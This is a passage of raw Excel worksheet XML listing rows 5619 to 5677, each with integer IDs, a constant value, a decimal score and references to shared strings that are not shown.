      <c r="C5619">
        <v>3052</v>
      </c>
      <c r="D5619">
        <v>3</v>
      </c>
      <c r="E5619">
        <v>0.49950000643730158</v>
      </c>
      <c r="F5619" t="s">
        <v>10120</v>
      </c>
      <c r="G5619" t="s">
        <v>11114</v>
      </c>
      <c r="H5619" t="s">
        <v>11115</v>
      </c>
    </row>
    <row r="5620" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5620" s="1">
        <v>5618</v>
      </c>
      <c r="B5620">
        <v>3198</v>
      </c>
      <c r="C5620">
        <v>3198</v>
      </c>
      <c r="D5620">
        <v>3</v>
      </c>
      <c r="E5620">
        <v>0.97659999132156372</v>
      </c>
      <c r="F5620" t="s">
        <v>10120</v>
      </c>
      <c r="G5620" t="s">
        <v>11116</v>
      </c>
      <c r="H5620" t="s">
        <v>11117</v>
      </c>
    </row>
    <row r="5621" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5621" s="1">
        <v>5619</v>
      </c>
      <c r="B5621">
        <v>3200</v>
      </c>
      <c r="C5621">
        <v>3200</v>
      </c>
      <c r="D5621">
        <v>3</v>
      </c>
      <c r="E5621">
        <v>0.67519998550415039</v>
      </c>
      <c r="F5621" t="s">
        <v>10120</v>
      </c>
      <c r="G5621" t="s">
        <v>11118</v>
      </c>
      <c r="H5621" t="s">
        <v>11119</v>
      </c>
    </row>
    <row r="5622" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5622" s="1">
        <v>5620</v>
      </c>
      <c r="B5622">
        <v>879</v>
      </c>
      <c r="C5622">
        <v>879</v>
      </c>
      <c r="D5622">
        <v>3</v>
      </c>
      <c r="E5622">
        <v>0.88559997081756592</v>
      </c>
      <c r="F5622" t="s">
        <v>10120</v>
      </c>
      <c r="G5622" t="s">
        <v>11120</v>
      </c>
      <c r="H5622" t="s">
        <v>11121</v>
      </c>
    </row>
    <row r="5623" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5623" s="1">
        <v>5621</v>
      </c>
      <c r="B5623">
        <v>877</v>
      </c>
      <c r="C5623">
        <v>877</v>
      </c>
      <c r="D5623">
        <v>3</v>
      </c>
      <c r="E5623">
        <v>0.62000000476837158</v>
      </c>
      <c r="F5623" t="s">
        <v>10120</v>
      </c>
      <c r="G5623" t="s">
        <v>11122</v>
      </c>
      <c r="H5623" t="s">
        <v>11123</v>
      </c>
    </row>
    <row r="5624" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5624" s="1">
        <v>5622</v>
      </c>
      <c r="B5624">
        <v>3297</v>
      </c>
      <c r="C5624">
        <v>3297</v>
      </c>
      <c r="D5624">
        <v>3</v>
      </c>
      <c r="E5624">
        <v>0.92549997568130493</v>
      </c>
      <c r="F5624" t="s">
        <v>10120</v>
      </c>
      <c r="G5624" t="s">
        <v>11124</v>
      </c>
      <c r="H5624" t="s">
        <v>11125</v>
      </c>
    </row>
    <row r="5625" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5625" s="1">
        <v>5623</v>
      </c>
      <c r="B5625">
        <v>3298</v>
      </c>
      <c r="C5625">
        <v>3298</v>
      </c>
      <c r="D5625">
        <v>3</v>
      </c>
      <c r="E5625">
        <v>0.66360002756118774</v>
      </c>
      <c r="F5625" t="s">
        <v>10120</v>
      </c>
      <c r="G5625" t="s">
        <v>11126</v>
      </c>
      <c r="H5625" t="s">
        <v>11127</v>
      </c>
    </row>
    <row r="5626" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5626" s="1">
        <v>5624</v>
      </c>
      <c r="B5626">
        <v>876</v>
      </c>
      <c r="C5626">
        <v>876</v>
      </c>
      <c r="D5626">
        <v>3</v>
      </c>
      <c r="E5626">
        <v>0.61529999971389771</v>
      </c>
      <c r="F5626" t="s">
        <v>10120</v>
      </c>
      <c r="G5626" t="s">
        <v>11128</v>
      </c>
      <c r="H5626" t="s">
        <v>11129</v>
      </c>
    </row>
    <row r="5627" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5627" s="1">
        <v>5625</v>
      </c>
      <c r="B5627">
        <v>3319</v>
      </c>
      <c r="C5627">
        <v>3319</v>
      </c>
      <c r="D5627">
        <v>3</v>
      </c>
      <c r="E5627">
        <v>0.80980002880096436</v>
      </c>
      <c r="F5627" t="s">
        <v>10120</v>
      </c>
      <c r="G5627" t="s">
        <v>11130</v>
      </c>
      <c r="H5627" t="s">
        <v>11131</v>
      </c>
    </row>
    <row r="5628" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5628" s="1">
        <v>5626</v>
      </c>
      <c r="B5628">
        <v>3326</v>
      </c>
      <c r="C5628">
        <v>3326</v>
      </c>
      <c r="D5628">
        <v>3</v>
      </c>
      <c r="E5628">
        <v>0.97229999303817749</v>
      </c>
      <c r="F5628" t="s">
        <v>10120</v>
      </c>
      <c r="G5628" t="s">
        <v>11132</v>
      </c>
      <c r="H5628" t="s">
        <v>11133</v>
      </c>
    </row>
    <row r="5629" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5629" s="1">
        <v>5627</v>
      </c>
      <c r="B5629">
        <v>864</v>
      </c>
      <c r="C5629">
        <v>864</v>
      </c>
      <c r="D5629">
        <v>3</v>
      </c>
      <c r="E5629">
        <v>0.57660001516342163</v>
      </c>
      <c r="F5629" t="s">
        <v>10120</v>
      </c>
      <c r="G5629" t="s">
        <v>11134</v>
      </c>
      <c r="H5629" t="s">
        <v>11135</v>
      </c>
    </row>
    <row r="5630" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5630" s="1">
        <v>5628</v>
      </c>
      <c r="B5630">
        <v>3336</v>
      </c>
      <c r="C5630">
        <v>3336</v>
      </c>
      <c r="D5630">
        <v>3</v>
      </c>
      <c r="E5630">
        <v>0.89579999446868896</v>
      </c>
      <c r="F5630" t="s">
        <v>10120</v>
      </c>
      <c r="G5630" t="s">
        <v>11136</v>
      </c>
      <c r="H5630" t="s">
        <v>11137</v>
      </c>
    </row>
    <row r="5631" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5631" s="1">
        <v>5629</v>
      </c>
      <c r="B5631">
        <v>3350</v>
      </c>
      <c r="C5631">
        <v>3350</v>
      </c>
      <c r="D5631">
        <v>3</v>
      </c>
      <c r="E5631">
        <v>0.70279997587203979</v>
      </c>
      <c r="F5631" t="s">
        <v>10120</v>
      </c>
      <c r="G5631" t="s">
        <v>11138</v>
      </c>
      <c r="H5631" t="s">
        <v>11139</v>
      </c>
    </row>
    <row r="5632" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5632" s="1">
        <v>5630</v>
      </c>
      <c r="B5632">
        <v>3351</v>
      </c>
      <c r="C5632">
        <v>3351</v>
      </c>
      <c r="D5632">
        <v>3</v>
      </c>
      <c r="E5632">
        <v>0.60339999198913574</v>
      </c>
      <c r="F5632" t="s">
        <v>10120</v>
      </c>
      <c r="G5632" t="s">
        <v>11140</v>
      </c>
      <c r="H5632" t="s">
        <v>11141</v>
      </c>
    </row>
    <row r="5633" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5633" s="1">
        <v>5631</v>
      </c>
      <c r="B5633">
        <v>863</v>
      </c>
      <c r="C5633">
        <v>863</v>
      </c>
      <c r="D5633">
        <v>3</v>
      </c>
      <c r="E5633">
        <v>0.72100001573562622</v>
      </c>
      <c r="F5633" t="s">
        <v>10120</v>
      </c>
      <c r="G5633" t="s">
        <v>11142</v>
      </c>
      <c r="H5633" t="s">
        <v>11143</v>
      </c>
    </row>
    <row r="5634" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5634" s="1">
        <v>5632</v>
      </c>
      <c r="B5634">
        <v>861</v>
      </c>
      <c r="C5634">
        <v>861</v>
      </c>
      <c r="D5634">
        <v>3</v>
      </c>
      <c r="E5634">
        <v>0.57520002126693726</v>
      </c>
      <c r="F5634" t="s">
        <v>10120</v>
      </c>
      <c r="G5634" t="s">
        <v>11144</v>
      </c>
      <c r="H5634" t="s">
        <v>11145</v>
      </c>
    </row>
    <row r="5635" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5635" s="1">
        <v>5633</v>
      </c>
      <c r="B5635">
        <v>858</v>
      </c>
      <c r="C5635">
        <v>858</v>
      </c>
      <c r="D5635">
        <v>3</v>
      </c>
      <c r="E5635">
        <v>0.41370001435279852</v>
      </c>
      <c r="F5635" t="s">
        <v>10120</v>
      </c>
      <c r="G5635" t="s">
        <v>11146</v>
      </c>
      <c r="H5635" t="s">
        <v>11147</v>
      </c>
    </row>
    <row r="5636" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5636" s="1">
        <v>5634</v>
      </c>
      <c r="B5636">
        <v>844</v>
      </c>
      <c r="C5636">
        <v>844</v>
      </c>
      <c r="D5636">
        <v>3</v>
      </c>
      <c r="E5636">
        <v>0.72659999132156372</v>
      </c>
      <c r="F5636" t="s">
        <v>10120</v>
      </c>
      <c r="G5636" t="s">
        <v>11148</v>
      </c>
      <c r="H5636" t="s">
        <v>11149</v>
      </c>
    </row>
    <row r="5637" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5637" s="1">
        <v>5635</v>
      </c>
      <c r="B5637">
        <v>3352</v>
      </c>
      <c r="C5637">
        <v>3352</v>
      </c>
      <c r="D5637">
        <v>3</v>
      </c>
      <c r="E5637">
        <v>0.99900001287460327</v>
      </c>
      <c r="F5637" t="s">
        <v>10120</v>
      </c>
      <c r="G5637" t="s">
        <v>11150</v>
      </c>
      <c r="H5637" t="s">
        <v>11151</v>
      </c>
    </row>
    <row r="5638" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5638" s="1">
        <v>5636</v>
      </c>
      <c r="B5638">
        <v>3355</v>
      </c>
      <c r="C5638">
        <v>3355</v>
      </c>
      <c r="D5638">
        <v>3</v>
      </c>
      <c r="E5638">
        <v>0.68169999122619629</v>
      </c>
      <c r="F5638" t="s">
        <v>10120</v>
      </c>
      <c r="G5638" t="s">
        <v>11152</v>
      </c>
      <c r="H5638" t="s">
        <v>11153</v>
      </c>
    </row>
    <row r="5639" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5639" s="1">
        <v>5637</v>
      </c>
      <c r="B5639">
        <v>3287</v>
      </c>
      <c r="C5639">
        <v>3287</v>
      </c>
      <c r="D5639">
        <v>3</v>
      </c>
      <c r="E5639">
        <v>0.7369999885559082</v>
      </c>
      <c r="F5639" t="s">
        <v>10120</v>
      </c>
      <c r="G5639" t="s">
        <v>11154</v>
      </c>
      <c r="H5639" t="s">
        <v>11155</v>
      </c>
    </row>
    <row r="5640" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5640" s="1">
        <v>5638</v>
      </c>
      <c r="B5640">
        <v>921</v>
      </c>
      <c r="C5640">
        <v>921</v>
      </c>
      <c r="D5640">
        <v>3</v>
      </c>
      <c r="E5640">
        <v>0.76160001754760742</v>
      </c>
      <c r="F5640" t="s">
        <v>10120</v>
      </c>
      <c r="G5640" t="s">
        <v>11156</v>
      </c>
      <c r="H5640" t="s">
        <v>11157</v>
      </c>
    </row>
    <row r="5641" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5641" s="1">
        <v>5639</v>
      </c>
      <c r="B5641">
        <v>3283</v>
      </c>
      <c r="C5641">
        <v>3283</v>
      </c>
      <c r="D5641">
        <v>3</v>
      </c>
      <c r="E5641">
        <v>0.87919998168945313</v>
      </c>
      <c r="F5641" t="s">
        <v>10120</v>
      </c>
      <c r="G5641" t="s">
        <v>11158</v>
      </c>
      <c r="H5641" t="s">
        <v>11159</v>
      </c>
    </row>
    <row r="5642" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5642" s="1">
        <v>5640</v>
      </c>
      <c r="B5642">
        <v>3275</v>
      </c>
      <c r="C5642">
        <v>3275</v>
      </c>
      <c r="D5642">
        <v>3</v>
      </c>
      <c r="E5642">
        <v>0.98769998550415039</v>
      </c>
      <c r="F5642" t="s">
        <v>10120</v>
      </c>
      <c r="G5642" t="s">
        <v>11160</v>
      </c>
      <c r="H5642" t="s">
        <v>11161</v>
      </c>
    </row>
    <row r="5643" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5643" s="1">
        <v>5641</v>
      </c>
      <c r="B5643">
        <v>3202</v>
      </c>
      <c r="C5643">
        <v>3202</v>
      </c>
      <c r="D5643">
        <v>3</v>
      </c>
      <c r="E5643">
        <v>0.88200002908706665</v>
      </c>
      <c r="F5643" t="s">
        <v>10120</v>
      </c>
      <c r="G5643" t="s">
        <v>11162</v>
      </c>
      <c r="H5643" t="s">
        <v>11163</v>
      </c>
    </row>
    <row r="5644" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5644" s="1">
        <v>5642</v>
      </c>
      <c r="B5644">
        <v>912</v>
      </c>
      <c r="C5644">
        <v>912</v>
      </c>
      <c r="D5644">
        <v>3</v>
      </c>
      <c r="E5644">
        <v>0.82959997653961182</v>
      </c>
      <c r="F5644" t="s">
        <v>10120</v>
      </c>
      <c r="G5644" t="s">
        <v>11164</v>
      </c>
      <c r="H5644" t="s">
        <v>11165</v>
      </c>
    </row>
    <row r="5645" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5645" s="1">
        <v>5643</v>
      </c>
      <c r="B5645">
        <v>3214</v>
      </c>
      <c r="C5645">
        <v>3214</v>
      </c>
      <c r="D5645">
        <v>3</v>
      </c>
      <c r="E5645">
        <v>0.5867999792098999</v>
      </c>
      <c r="F5645" t="s">
        <v>10120</v>
      </c>
      <c r="G5645" t="s">
        <v>11166</v>
      </c>
      <c r="H5645" t="s">
        <v>11167</v>
      </c>
    </row>
    <row r="5646" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5646" s="1">
        <v>5644</v>
      </c>
      <c r="B5646">
        <v>3222</v>
      </c>
      <c r="C5646">
        <v>3222</v>
      </c>
      <c r="D5646">
        <v>3</v>
      </c>
      <c r="E5646">
        <v>0.63510000705718994</v>
      </c>
      <c r="F5646" t="s">
        <v>10120</v>
      </c>
      <c r="G5646" t="s">
        <v>11168</v>
      </c>
      <c r="H5646" t="s">
        <v>11169</v>
      </c>
    </row>
    <row r="5647" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5647" s="1">
        <v>5645</v>
      </c>
      <c r="B5647">
        <v>3223</v>
      </c>
      <c r="C5647">
        <v>3223</v>
      </c>
      <c r="D5647">
        <v>3</v>
      </c>
      <c r="E5647">
        <v>0.89990001916885376</v>
      </c>
      <c r="F5647" t="s">
        <v>10120</v>
      </c>
      <c r="G5647" t="s">
        <v>11170</v>
      </c>
      <c r="H5647" t="s">
        <v>11171</v>
      </c>
    </row>
    <row r="5648" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5648" s="1">
        <v>5646</v>
      </c>
      <c r="B5648">
        <v>3227</v>
      </c>
      <c r="C5648">
        <v>3227</v>
      </c>
      <c r="D5648">
        <v>3</v>
      </c>
      <c r="E5648">
        <v>0.54890000820159912</v>
      </c>
      <c r="F5648" t="s">
        <v>10120</v>
      </c>
      <c r="G5648" t="s">
        <v>11172</v>
      </c>
      <c r="H5648" t="s">
        <v>11173</v>
      </c>
    </row>
    <row r="5649" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5649" s="1">
        <v>5647</v>
      </c>
      <c r="B5649">
        <v>3232</v>
      </c>
      <c r="C5649">
        <v>3232</v>
      </c>
      <c r="D5649">
        <v>3</v>
      </c>
      <c r="E5649">
        <v>0.99409997463226318</v>
      </c>
      <c r="F5649" t="s">
        <v>10120</v>
      </c>
      <c r="G5649" t="s">
        <v>11174</v>
      </c>
      <c r="H5649" t="s">
        <v>11175</v>
      </c>
    </row>
    <row r="5650" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5650" s="1">
        <v>5648</v>
      </c>
      <c r="B5650">
        <v>890</v>
      </c>
      <c r="C5650">
        <v>890</v>
      </c>
      <c r="D5650">
        <v>3</v>
      </c>
      <c r="E5650">
        <v>0.79240000247955322</v>
      </c>
      <c r="F5650" t="s">
        <v>10120</v>
      </c>
      <c r="G5650" t="s">
        <v>11176</v>
      </c>
      <c r="H5650" t="s">
        <v>11177</v>
      </c>
    </row>
    <row r="5651" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5651" s="1">
        <v>5649</v>
      </c>
      <c r="B5651">
        <v>3235</v>
      </c>
      <c r="C5651">
        <v>3235</v>
      </c>
      <c r="D5651">
        <v>3</v>
      </c>
      <c r="E5651">
        <v>0.98119997978210449</v>
      </c>
      <c r="F5651" t="s">
        <v>10120</v>
      </c>
      <c r="G5651" t="s">
        <v>11178</v>
      </c>
      <c r="H5651" t="s">
        <v>11179</v>
      </c>
    </row>
    <row r="5652" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5652" s="1">
        <v>5650</v>
      </c>
      <c r="B5652">
        <v>3236</v>
      </c>
      <c r="C5652">
        <v>3236</v>
      </c>
      <c r="D5652">
        <v>3</v>
      </c>
      <c r="E5652">
        <v>0.65460002422332764</v>
      </c>
      <c r="F5652" t="s">
        <v>10120</v>
      </c>
      <c r="G5652" t="s">
        <v>11180</v>
      </c>
      <c r="H5652" t="s">
        <v>11181</v>
      </c>
    </row>
    <row r="5653" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5653" s="1">
        <v>5651</v>
      </c>
      <c r="B5653">
        <v>3239</v>
      </c>
      <c r="C5653">
        <v>3239</v>
      </c>
      <c r="D5653">
        <v>3</v>
      </c>
      <c r="E5653">
        <v>0.68379998207092285</v>
      </c>
      <c r="F5653" t="s">
        <v>10120</v>
      </c>
      <c r="G5653" t="s">
        <v>11182</v>
      </c>
      <c r="H5653" t="s">
        <v>11183</v>
      </c>
    </row>
    <row r="5654" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5654" s="1">
        <v>5652</v>
      </c>
      <c r="B5654">
        <v>3241</v>
      </c>
      <c r="C5654">
        <v>3241</v>
      </c>
      <c r="D5654">
        <v>3</v>
      </c>
      <c r="E5654">
        <v>0.91490000486373901</v>
      </c>
      <c r="F5654" t="s">
        <v>10120</v>
      </c>
      <c r="G5654" t="s">
        <v>11184</v>
      </c>
      <c r="H5654" t="s">
        <v>11185</v>
      </c>
    </row>
    <row r="5655" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5655" s="1">
        <v>5653</v>
      </c>
      <c r="B5655">
        <v>3242</v>
      </c>
      <c r="C5655">
        <v>3242</v>
      </c>
      <c r="D5655">
        <v>3</v>
      </c>
      <c r="E5655">
        <v>0.6995999813079834</v>
      </c>
      <c r="F5655" t="s">
        <v>10120</v>
      </c>
      <c r="G5655" t="s">
        <v>11186</v>
      </c>
      <c r="H5655" t="s">
        <v>11187</v>
      </c>
    </row>
    <row r="5656" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5656" s="1">
        <v>5654</v>
      </c>
      <c r="B5656">
        <v>3249</v>
      </c>
      <c r="C5656">
        <v>3249</v>
      </c>
      <c r="D5656">
        <v>3</v>
      </c>
      <c r="E5656">
        <v>0.73710000514984131</v>
      </c>
      <c r="F5656" t="s">
        <v>10120</v>
      </c>
      <c r="G5656" t="s">
        <v>11188</v>
      </c>
      <c r="H5656" t="s">
        <v>11189</v>
      </c>
    </row>
    <row r="5657" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5657" s="1">
        <v>5655</v>
      </c>
      <c r="B5657">
        <v>3256</v>
      </c>
      <c r="C5657">
        <v>3256</v>
      </c>
      <c r="D5657">
        <v>3</v>
      </c>
      <c r="E5657">
        <v>0.58190000057220459</v>
      </c>
      <c r="F5657" t="s">
        <v>10120</v>
      </c>
      <c r="G5657" t="s">
        <v>11190</v>
      </c>
      <c r="H5657" t="s">
        <v>11191</v>
      </c>
    </row>
    <row r="5658" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5658" s="1">
        <v>5656</v>
      </c>
      <c r="B5658">
        <v>3265</v>
      </c>
      <c r="C5658">
        <v>3265</v>
      </c>
      <c r="D5658">
        <v>3</v>
      </c>
      <c r="E5658">
        <v>0.99839997291564941</v>
      </c>
      <c r="F5658" t="s">
        <v>10120</v>
      </c>
      <c r="G5658" t="s">
        <v>11192</v>
      </c>
      <c r="H5658" t="s">
        <v>11193</v>
      </c>
    </row>
    <row r="5659" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5659" s="1">
        <v>5657</v>
      </c>
      <c r="B5659">
        <v>3274</v>
      </c>
      <c r="C5659">
        <v>3274</v>
      </c>
      <c r="D5659">
        <v>3</v>
      </c>
      <c r="E5659">
        <v>0.98229998350143433</v>
      </c>
      <c r="F5659" t="s">
        <v>10120</v>
      </c>
      <c r="G5659" t="s">
        <v>11194</v>
      </c>
      <c r="H5659" t="s">
        <v>11195</v>
      </c>
    </row>
    <row r="5660" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5660" s="1">
        <v>5658</v>
      </c>
      <c r="B5660">
        <v>3276</v>
      </c>
      <c r="C5660">
        <v>3276</v>
      </c>
      <c r="D5660">
        <v>3</v>
      </c>
      <c r="E5660">
        <v>0.99750000238418579</v>
      </c>
      <c r="F5660" t="s">
        <v>10120</v>
      </c>
      <c r="G5660" t="s">
        <v>11196</v>
      </c>
      <c r="H5660" t="s">
        <v>11197</v>
      </c>
    </row>
    <row r="5661" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5661" s="1">
        <v>5659</v>
      </c>
      <c r="B5661">
        <v>3047</v>
      </c>
      <c r="C5661">
        <v>3047</v>
      </c>
      <c r="D5661">
        <v>3</v>
      </c>
      <c r="E5661">
        <v>0.46200001239776611</v>
      </c>
      <c r="F5661" t="s">
        <v>10120</v>
      </c>
      <c r="G5661" t="s">
        <v>11198</v>
      </c>
      <c r="H5661" t="s">
        <v>11199</v>
      </c>
    </row>
    <row r="5662" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5662" s="1">
        <v>5660</v>
      </c>
      <c r="B5662">
        <v>3035</v>
      </c>
      <c r="C5662">
        <v>3035</v>
      </c>
      <c r="D5662">
        <v>3</v>
      </c>
      <c r="E5662">
        <v>0.51380002498626709</v>
      </c>
      <c r="F5662" t="s">
        <v>10120</v>
      </c>
      <c r="G5662" t="s">
        <v>11200</v>
      </c>
      <c r="H5662" t="s">
        <v>11201</v>
      </c>
    </row>
    <row r="5663" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5663" s="1">
        <v>5661</v>
      </c>
      <c r="B5663">
        <v>3029</v>
      </c>
      <c r="C5663">
        <v>3029</v>
      </c>
      <c r="D5663">
        <v>3</v>
      </c>
      <c r="E5663">
        <v>0.88899999856948853</v>
      </c>
      <c r="F5663" t="s">
        <v>10120</v>
      </c>
      <c r="G5663" t="s">
        <v>11202</v>
      </c>
      <c r="H5663" t="s">
        <v>11203</v>
      </c>
    </row>
    <row r="5664" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5664" s="1">
        <v>5662</v>
      </c>
      <c r="B5664">
        <v>2860</v>
      </c>
      <c r="C5664">
        <v>2860</v>
      </c>
      <c r="D5664">
        <v>3</v>
      </c>
      <c r="E5664">
        <v>0.80479997396469116</v>
      </c>
      <c r="F5664" t="s">
        <v>10120</v>
      </c>
      <c r="G5664" t="s">
        <v>11204</v>
      </c>
      <c r="H5664" t="s">
        <v>11205</v>
      </c>
    </row>
    <row r="5665" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5665" s="1">
        <v>5663</v>
      </c>
      <c r="B5665">
        <v>2872</v>
      </c>
      <c r="C5665">
        <v>2872</v>
      </c>
      <c r="D5665">
        <v>3</v>
      </c>
      <c r="E5665">
        <v>0.68279999494552612</v>
      </c>
      <c r="F5665" t="s">
        <v>10120</v>
      </c>
      <c r="G5665" t="s">
        <v>11206</v>
      </c>
      <c r="H5665" t="s">
        <v>11207</v>
      </c>
    </row>
    <row r="5666" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5666" s="1">
        <v>5664</v>
      </c>
      <c r="B5666">
        <v>2875</v>
      </c>
      <c r="C5666">
        <v>2875</v>
      </c>
      <c r="D5666">
        <v>3</v>
      </c>
      <c r="E5666">
        <v>0.70870000123977661</v>
      </c>
      <c r="F5666" t="s">
        <v>10120</v>
      </c>
      <c r="G5666" t="s">
        <v>11208</v>
      </c>
      <c r="H5666" t="s">
        <v>11209</v>
      </c>
    </row>
    <row r="5667" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5667" s="1">
        <v>5665</v>
      </c>
      <c r="B5667">
        <v>2876</v>
      </c>
      <c r="C5667">
        <v>2876</v>
      </c>
      <c r="D5667">
        <v>3</v>
      </c>
      <c r="E5667">
        <v>0.99419999122619629</v>
      </c>
      <c r="F5667" t="s">
        <v>10120</v>
      </c>
      <c r="G5667" t="s">
        <v>11210</v>
      </c>
      <c r="H5667" t="s">
        <v>11211</v>
      </c>
    </row>
    <row r="5668" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5668" s="1">
        <v>5666</v>
      </c>
      <c r="B5668">
        <v>2880</v>
      </c>
      <c r="C5668">
        <v>2880</v>
      </c>
      <c r="D5668">
        <v>3</v>
      </c>
      <c r="E5668">
        <v>0.73559999465942383</v>
      </c>
      <c r="F5668" t="s">
        <v>10120</v>
      </c>
      <c r="G5668" t="s">
        <v>11212</v>
      </c>
      <c r="H5668" t="s">
        <v>11213</v>
      </c>
    </row>
    <row r="5669" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5669" s="1">
        <v>5667</v>
      </c>
      <c r="B5669">
        <v>2888</v>
      </c>
      <c r="C5669">
        <v>2888</v>
      </c>
      <c r="D5669">
        <v>3</v>
      </c>
      <c r="E5669">
        <v>0.50499999523162842</v>
      </c>
      <c r="F5669" t="s">
        <v>10120</v>
      </c>
      <c r="G5669" t="s">
        <v>11214</v>
      </c>
      <c r="H5669" t="s">
        <v>11215</v>
      </c>
    </row>
    <row r="5670" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5670" s="1">
        <v>5668</v>
      </c>
      <c r="B5670">
        <v>2889</v>
      </c>
      <c r="C5670">
        <v>2889</v>
      </c>
      <c r="D5670">
        <v>3</v>
      </c>
      <c r="E5670">
        <v>0.72119998931884766</v>
      </c>
      <c r="F5670" t="s">
        <v>10120</v>
      </c>
      <c r="G5670" t="s">
        <v>11216</v>
      </c>
      <c r="H5670" t="s">
        <v>11217</v>
      </c>
    </row>
    <row r="5671" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5671" s="1">
        <v>5669</v>
      </c>
      <c r="B5671">
        <v>2891</v>
      </c>
      <c r="C5671">
        <v>2891</v>
      </c>
      <c r="D5671">
        <v>3</v>
      </c>
      <c r="E5671">
        <v>0.73110002279281616</v>
      </c>
      <c r="F5671" t="s">
        <v>10120</v>
      </c>
      <c r="G5671" t="s">
        <v>11218</v>
      </c>
      <c r="H5671" t="s">
        <v>11219</v>
      </c>
    </row>
    <row r="5672" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5672" s="1">
        <v>5670</v>
      </c>
      <c r="B5672">
        <v>2894</v>
      </c>
      <c r="C5672">
        <v>2894</v>
      </c>
      <c r="D5672">
        <v>3</v>
      </c>
      <c r="E5672">
        <v>0.88770002126693726</v>
      </c>
      <c r="F5672" t="s">
        <v>10120</v>
      </c>
      <c r="G5672" t="s">
        <v>11220</v>
      </c>
      <c r="H5672" t="s">
        <v>11221</v>
      </c>
    </row>
    <row r="5673" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5673" s="1">
        <v>5671</v>
      </c>
      <c r="B5673">
        <v>2895</v>
      </c>
      <c r="C5673">
        <v>2895</v>
      </c>
      <c r="D5673">
        <v>3</v>
      </c>
      <c r="E5673">
        <v>0.46160000562667852</v>
      </c>
      <c r="F5673" t="s">
        <v>10120</v>
      </c>
      <c r="G5673" t="s">
        <v>11222</v>
      </c>
      <c r="H5673" t="s">
        <v>11223</v>
      </c>
    </row>
    <row r="5674" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5674" s="1">
        <v>5672</v>
      </c>
      <c r="B5674">
        <v>2896</v>
      </c>
      <c r="C5674">
        <v>2896</v>
      </c>
      <c r="D5674">
        <v>3</v>
      </c>
      <c r="E5674">
        <v>0.65859997272491455</v>
      </c>
      <c r="F5674" t="s">
        <v>10120</v>
      </c>
      <c r="G5674" t="s">
        <v>11224</v>
      </c>
      <c r="H5674" t="s">
        <v>11225</v>
      </c>
    </row>
    <row r="5675" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5675" s="1">
        <v>5673</v>
      </c>
      <c r="B5675">
        <v>2897</v>
      </c>
      <c r="C5675">
        <v>2897</v>
      </c>
      <c r="D5675">
        <v>3</v>
      </c>
      <c r="E5675">
        <v>0.98629999160766602</v>
      </c>
      <c r="F5675" t="s">
        <v>10120</v>
      </c>
      <c r="G5675" t="s">
        <v>11226</v>
      </c>
      <c r="H5675" t="s">
        <v>11227</v>
      </c>
    </row>
    <row r="5676" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5676" s="1">
        <v>5674</v>
      </c>
      <c r="B5676">
        <v>2902</v>
      </c>
      <c r="C5676">
        <v>2902</v>
      </c>
      <c r="D5676">
        <v>3</v>
      </c>
      <c r="E5676">
        <v>0.52359998226165771</v>
      </c>
      <c r="F5676" t="s">
        <v>10120</v>
      </c>
      <c r="G5676" t="s">
        <v>11228</v>
      </c>
      <c r="H5676" t="s">
        <v>11229</v>
      </c>
    </row>
    <row r="5677" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5677" s="1">
        <v>5675</v>
      </c>
      <c r="B5677">
        <v>2918</v>
      </c>
      <c r="C5677">
        <v>2918</v>
      </c>
      <c r="D5677">
        <v>3</v>
      </c>
      <c r="E5677">
        <v>0.49660000205039978</v>
      </c>
      <c r="F5677" t="s">
        <v>10120</v>
      </c>
